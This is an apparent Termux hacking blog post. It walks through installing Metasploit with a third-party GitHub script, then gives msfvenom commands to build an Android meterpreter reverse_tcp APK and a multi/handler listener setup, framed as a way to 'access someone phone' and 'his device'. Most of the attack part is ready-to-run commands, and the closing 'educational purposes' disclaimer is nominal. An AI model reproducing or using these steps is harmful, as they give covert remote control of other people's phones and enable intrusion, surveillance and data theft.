Hello guys,today I gotta introduce a very important tool in a hacker book that is metasploit framework..We use this tool for connecting payload..We can easily access someone phone using payload.but we need to install metasploit for make a connection between payload and metasploit framework..So without waste more time let's get started......
Metasploit-Framework is a ruby based penetration testing platform that enables you write test and exploit code.its a essential tool for many attackers and defenders
Installation Cmd :-
$ pkg upgrade && pkg update -y
$ pkg install python python2
$ pkg install git
$ git clone https://github.com/Ethical-Hacking-Zone/T-Lazy
https://t.me/TermuxOfficial01
DARKSTALKER:-
$ ls
$ cd T-Lazy
$ chmod +x install.sh
$ bash install.sh
Usages :-
$ python3 -m pip install requests
$ ls
$ python3 T-Lazy.py
Now choose first one install Metasploit-Framework option.then run that script until you can see successfully installed Metasploit-Framework in your terminal..then you can type 👇
First section :-
$ msfconsole
(For run/install msfconsole)
Second section :-
msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT 4444 R > /storage/emulated/0/Dmx.apk
Then back to first section
(Confirm it when ur in Metasploit-Framework)
So type the following cmds given below :-
● use exploit/multi/handler
● set payload android/meterpreter/reverse_tcp
● set LHOST (your ip)
● set LPORT 4444
● exploit
Type help for more cmd after access his device..🔥
I hope this information helpful for you.if u found something interesting on this blog share and support us for more updates.
This tutorial only for educational purposes. I will not responsible what done by you.join my Telegram channel if you wanna learn more about Termux hacking.
Telegram channel:- TERMUX 【OFFICIAL】